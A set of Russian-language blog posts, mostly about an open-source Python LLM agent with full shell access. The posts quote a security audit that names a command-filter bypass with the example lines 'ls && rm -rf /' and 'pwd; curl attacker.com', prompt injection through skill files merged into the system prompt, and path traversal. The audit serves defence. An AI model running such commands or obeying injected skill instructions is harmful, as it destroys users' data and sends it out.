Bednyakov

Если что, Агент Ануфрий работает на любых системах, он кроссплатформенный. Прямо сейчас он пыхтит на Windows и за 0 руб./токен ломает сайт Пентагона, ведь запущен на локальной модели qwen3-14b на древнем железе. Агент Ануфрий - это open source-конструктор для создания собственных ассистентов на Python. Базовый агент уже мультиплатформенный, с долговременной памятью, автоматизацией браузера через CDP/Playwright, трекером задач, и системой навыков. Репозиторий: AgentAnufry

Агент Ануфрий и безопасность, что не так? Спасибо всем, кто проявил интерес к проекту, и сейчас хотел бы уделить внимание теме безопасности. Напомню, основная идея проекта - дать инженерам и энтузиастам простую базовую конструкцию мультизадачного агента с т.н. искусственным интеллектом для пробуждения интереса к теме разработки ИИ-агентов на базе больших языковых моделей. Структура максимально упрощена, чтобы вы могли за незначительное время переработать модули агента частично или полностью: - заменить БД или изменить правила работы с памятью - усовершенствовать или переписать встроенные навыки - добавить новые инструменты для работы в интернете - улучшить обработку модульных скиллов - оптимизировать работу с LLM Вместе с тем, Ануфрий имеет полный доступ к Shell, о чем он предупреждает при запуске. Конечно, имеются некотрые встроенные ограничения, в целях безопасности, но они не ультимативные. Т.е. если сильно захотеть, агент сможет даже свой собственный код перписать и перезапуститься в обновленной форме через крон-функцию, например. У этого есть плюс: не обязательно добавлять ему какие-то инструменты для выполнения новых задач, он может нахимичить их сам. Но есть и минус: если агент запущен в неизолированной среде, он может положить систему наглухо. Если вы планируете использовать эту базу для разработки серьезного агента под бизнес-цели, вам следует учесть выводы аудита по безопасности, который провел Наиль Шакуров на GitHub. Далее полная цитата: ``` В ходе аудита кода проекта обнаружены серьезные проблемы с безопасностью, которые позволяют выполнять произвольный код на хост-системе пользователя. Выполнение произвольного shell-кода через уязвимый черный список В файле tools/shell.py используется shell=True в subprocess.run(command, shell=True). При этом ограничение ALLOWED_COMMANDS проверяет только начало строки. Проблема: LLM-агент может легко обойти этот фильтр, используя конвейеры или разделители команд (например, ls && rm -rf / или pwd; curl attacker.com). Черный список неэффективен. Решение: Использовать shell=False и передавать команды списком аргументов, либо полностью изолировать среду исполнения (Docker/микровиртуалки). Неконтролируемый chmod 755 в раннере навыков В файле tools/skills_runner.py функция os.chmod(script_path, 0o755) делает исполняемыми любые файлы из папки навыков без предварительной валидации их содержимого. -Проблема: В сочетании с возможностью записи файлов это позволяет агенту создавать и запускать любые бинарные файлы или скрипты на хосте. Prompt Injection через файлы навыков Файлы skill.md считываются напрямую и подмешиваются в системный промпт (skills/loader.py). При наличии недоверенного источника навыков это ведет к инъекции инструкций, заставляющих агента выполнить вредоносные действия через shell. Отсутствие валидации путей (Path Traversal) в поиске файлов Функция search_files в tools/filesystem.py не проверяет выход за пределы рабочего каталога (workspace), в отличие от функций чтения и записи файлов. ``` Репозиторий проекта: GitHub > AgentAnufry

Пока все обсуждают “революционных AI-агентов”, я решил сделать противоположную вещь — максимально простой open source-конструктор для создания собственных ассистентов на Python. Без гигантских фреймворков, сотен абстракций и архитектуры, в которую страшно заходить новичку. В итоге получился «Агент Ануфрий» — базовый AI-агент с: — долговременной памятью (SQLite + embeddings), — системой навыков (skills), — управлением браузером через Playwright, — трекером задач, — файловой системой, — поддержкой локальных LLM через OpenAI-compatible API. Основная идея проекта — показать, что агентостроение не является какой-то “магией ”. Базового инженерного опыта уже достаточно, чтобы начать собирать собственных AI-ассистентов под свои задачи. Если вам интересны: — AI-агенты, — Python, — LLM, — автоматизация, — agentic systems, — или просто хочется покопаться в архитектуре — заходите в репозиторий, изучайте код, форкайте, ломайте, переписывайте под себя. Особенно буду рад, если проект поможет кому-то написать своего первого агента. GitHub: [AgentAnufry]

Товарищ, не время отдыхать! Расклад сил братьев на сегодня: Терминаторы Свинцова (заблокировали 16571 IP) Нежить Ростелеком (заблокировали 14832 IP) Охранники Роскомнадзора (заблокировали 11406 IP) Но еретики придумывают все больше методов обхода блокировок, мы не можем на это просто смотреть. Забаним все IP-адреса в галактике! За Императора! Присоединиться к битве: t.me/...bot

Написал на Python игру в виде Telegram Mini App о командах чиновников, которые бьются за максимальное количество блокировок в интернете. Кажется, людям понравилось, количество игроков все прибавляется. Правда, есть и минусы, с каждым заблокированным IP в игре все хуже работает реальный интернет. И все же, приглашаю оценить: t.me/...bot

Простой скрипт на Python для генерации криптокошельков по маске (с определенными символами вначале и конце) На настоящий момент присутствуют генераторы для BTC, ETH и TRON, постепенно добавлю еще. Генерация происходит на всех доступных ядрях CPU, что ускоряет нахождение нужного адреса. Но всё равно это слишком медленно, нежели использовать GPU, который содержит тысячи небольших и менее мощных ядер, работающих параллельно. Что позволяет обрабатывать действительно большие массивы данных одновременно. В Python есть библиотеки, с помощью которых можно передавать некоторые вычисления на GPU, но они несовместимы с криптографическими операциями на Python, так как GPU не имеет доступа к Python-объектам и библиотекам. Соответственно, Python просто не подходит для таких задач. Учитывая изложенное, стоит иметь ввиду, что чем сложнее маска адреса, и слабее CPU, тем дольше придется ждать результата. Не забывайте сохранять приватный ключ, и лучше в зашифрованном виде.  GitHub проекта.

Российские IT-компании готовятся к массовому отключению иностранных сервисов. Большинство привычных сервисов могу скоро просто отвалиться. Все из-за санкций Минфина США, которые запрещают предоставление услуг в сфере программного обеспечения, IT-консультирования и проектирования на территории РФ. Российские IT-конторы, соответственно, вынуждены искать бесплатные альтернативы с открытым кодом, на которые не распространяется запрет, а облачные хранилища теперь — только российские. Кстати, как я смотрю, Сбер очень активно к этому готовился. У них и IDE на базе PyCharm— GIGA IDE, и гит-платформа GitVerse (полный аналог GitHub), и куча еще всего. Я пока не особо тестил GIGA IDE, т.к. полностью перешел на майковский VS Code. Но он на базе комьюнити версии, только с разными плюшками и ИИ. А гит-платформа выглядит симпатично, ничего больше сказать не могу. Вероятно, всё это имеет очень хороший смысл, если трудишься полностью в их экосистеме. В любом случае, молодцы, что предоставляют альтернативу.